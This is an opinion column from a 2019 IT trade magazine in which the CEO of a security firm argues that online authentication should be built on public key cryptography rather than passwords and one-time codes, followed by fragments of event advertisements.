From Scarlet Pimpernel to Rudolf Rassendyll, the pretend king of Ruritania, the ill-fated but noble Sydney Carton and Ethan Hunt engage and hold our attention when they successfully pull off an impersonation. We applaud hero and villain alike when they cleverly masquerade as someone else in person, by letter or as a voice on a telephone. It ceases to be amusing when the person being impersonated is ourselves and we realize that the object of the impersonator was not our entertainment. At the end of the show, we find that a huge price has been extracted from us for a brief showing of skills we never wanted to witness in the first place! Unfortunately, we subconsciously hesitate to hold an impersonator’s crime as equal to that of a murderer, a thief or a rapist or such heinous criminals. It is only when we are the victim, the penny drops and we realize that identity theft is no less horrifying than the other crimes listed. Much of the authentication related problems we face in the internet worked applications have their root in our inability to get past our collective mental image that authentication and identity are so tied to our five senses. This is how we have historically visualized identity - associating it with a face, with a gait, a voice, the language and the cadence, things the person knows from his personal memory and so on. The kind of authentication methods and ‘factors’ we have adopted in our internet based applications would seem to appeal to that anthropomorphic concept of identity. Our inner child notwithstanding, Internet is now a grownups game. If we intend to heed our old instincts, we should be prepared to be a victim of every casual impersonator and identity thief that crosses our path. The concept of identity on internet and authenticating it has little to do with what appeals

j u ly 2019

b. robert raja, ceo, odyssey technologies

to the human senses or even our common sense. Identity on the Internet is not looks, nor smell, not sound, not feel – it has to be based on cold mathematics and cryptography. Our inherent preference to make this as enjoyable as a game frequently leads us to doom. Cryptography ceased to be a game of wordsmiths and linguists eight decades ago. It has no more anything to do with meaning, sounds or symbols. Claude Shannon sounded the death knell for all that by putting it entirely on a

measurable and mathematical foundation. While symmetric cryptography left its linguistic roots in the fifties, the sixties and seventies brought us asymmetric cryptography which took the art much further. A truly maintainable digital identity could now be based on an asymmetric cryptosystem. The only system that does not depend on any shared secret, this is capable of defining and maintaining an identity that no digital Scarlet Pimpernel can falsely assume. The only thing that remained then was a reliable way of tying such unforgeable digital identities to human and other physical entities. The Public Key Infrastructure (PKI) that emerged in the last decade of the last century was an attempt at that. The standards and protocols that evolved then were also aided by sympathetic regulation in several parts of the world. Nevertheless, PKI has not been the roaring success it could have been. We need not look far for the reasons. In trying to be everything to everybody, PKI made itself hugely cumbersome to use. Nor was it successful in appealing to the fun-loving self in all of us. This is not an indictment of the technology itself. Public key cryptography lies at the core of several, constantly-used and highly trusted applications like device authentication, defense communications and high value financial transactions. It has also captured the populaar imagination where it is embedded into the cryptocurrencies and other applications that use Blockchain algorithms. It is a matter of time before we come to the collective realization that using Public Key Cryptography is the only secure and optimal way to reliable authentication. Along the route we will continue to face mega-thefts of identity and keep pretending to be surprised when someone cleans up our bank accounts protected by a really strong password with a second factor of OTP as well. ë

SEPTEMBER-DECEMBER, 2019

CONTINENTS

COUNTRIES

3000+

C-LEVEL EXECUTIVES

B R O U G H T BY

W W W. G LO BA LC I O FO R U M . C O M

#REVOLVESENTINELS PRESENTS

04 SEPTEMBER 2019

DUBAI, UNITED ARAB EMIRATES

12 SEPTEMBER 2019

KSA, RIYADH, KINGDOM OF SAUDI ARABIA

ARE YOUR CYBER SENTINELS ARMED? BROUGHT BY

OFFICIAL MEDIA PARTNER

FOR MORE VISIT: gecmediagroup.com CONTACT: arun@gecmediagroup.com, anushree@gecmediagroup.com, divsha@gecmediagroup.com, ronak@gecmediagroup.com, FOLLOW US: